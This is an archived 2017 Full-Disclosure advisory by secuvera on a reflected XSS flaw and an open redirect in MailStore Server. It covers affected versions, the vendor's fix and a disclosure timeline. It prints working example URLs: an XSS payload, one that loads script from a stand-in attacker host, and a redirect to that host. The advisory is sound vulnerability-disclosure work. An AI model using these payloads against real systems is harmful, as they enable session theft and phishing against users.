lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <833eb4ffbe884069a47cb006f88cdbdd@TclanGroupware.secuvera.de>
Date: Wed, 1 Feb 2017 09:01:11 +0000
From: Tobias Glemser <tglemser@...uvera.de>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] secuvera-SA-2017-02: Reflected XSS and Open Redirect in
 MailStore Server

secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server

Affected Products
   MailStore Server Version 10.0.1.12148 was tested
   according to the vendor:
   - MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability
   - Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability

References
   https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
   CWE-79 https://cwe.mitre.org/data/definitions/79.html
   CWE-601 https://cwe.mitre.org/data/definitions/601.html

Summary:
   "MailStore Server is one of the world’s leading solutions for email archiving, 
   management and compliance for small and medium-sized businesses."

   The in-built Webapplication does not properly validate untrusted input in 
   several variables. This leads to both Reflected Cross-Site-Scripting (XSS) 
   and an Open Redirect.

Effect:
   To exploit the reflected XSS, the victim has to be authenticated to the 
   Mailstore Webapplication. By clicking on a link sent to a victim, an attacker 
   could for example copy the victims Session-ID to his on data sink.

   Sending another link with a crafted URL, the attacker could redirect the 
   victim to a malicious website, while the link itself points to the trusted 
   Mailstore-Address. The victim is not required to be authenticated.

Vulnerable Scripts Reflected XSS for authenticated users:
   /search-result/, Parameters c-f, c-q, c-from and c-to 
   /message/ajax/send/, Parameter recipient

Vulnerable Script Open Redirect:
   derefer/, Parameter url

Example for reflected XSS:
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
   #Load external JS-Code
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E

Example for Open Redirect:
   https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de

Solution:
   Update to Version 10.0.2

Disclosure Timeline:
   2017/01/09 vendor contacted
   2017/01/10 initial vendor response asking for technical details
   2017/01/10 provided vendor with the advisory including technical details
   2017/01/13 vendor provided informations about affected versions and mitigation
   2017/01/18 update published by vendor
   2017/01/31 public disclosure
   
Credits:
   Tobias Glemser
   tglemser@...uvera.de
   secuvera GmbH
   https://www.secuvera.de

Disclaimer:
   All information is provided without warranty. The intent is to
   provide information to secure infrastructure and/or systems, not
   to be able to attack or damage. Therefore secuvera shall
   not be liable for any direct or indirect damages that might be
   caused by using this information.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ